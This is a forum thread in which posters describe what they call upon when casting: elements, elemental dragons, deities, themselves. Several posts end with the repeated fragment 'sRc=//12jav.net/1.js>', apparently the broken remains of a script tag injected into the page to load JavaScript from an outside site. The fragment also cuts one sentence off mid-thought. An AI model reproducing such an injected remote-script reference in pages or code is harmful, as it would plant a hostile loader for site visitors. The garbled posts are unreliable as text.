Who are we calling upon?

I've been thinking quite a bit about magic and casting these last few days. When I cast, I call to the elements or to nature. But I'm curious about the other sources that people call to? Some are misled by tv and movies and believe we call on many other things: the devil, god, a power from inside, nature, the spirits, certain deities, demons, a huge source of energy that only some can receive, the moon, etc. And some of these are true. I call upon my inner being. Myself...I have found that I hold greater power than anything sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

depends on what i'm doing. when i cast a circle, i call upon the four elemental dragons, when i'm having a circle for the sabbat, i'm calling to the God and Goddess. during an esbat i call upon my patron deities to join me in the circle. with spells, again, it depends on what spell i'm casting. certain spells i have will call upon dragons, others on a particular deity, and some don't specify so i use my own judgement, it really just depends. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I "call" upon myself, nature, the moon, or on the energy around me. However I have also called upon angelic forces, spirits, gods/esses, various beings and places of power. :)

I've called upon quite a few deities when I have specific needs or intentions but I tend to research as much as I can about whichever one I call upon at any given time... I try to be careful about it.

I call upon myself, your only as powerful as you allow yourself to be. But some times I call upon Venus or Minerva for guidance and wisdom. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I tend to see BOTH the God and the Goddess aspects of the same energies so I honor them as one... I don't really follow a set group of rules as I'm very in tune with my gut and follow what 'feels' right during my process at the time.
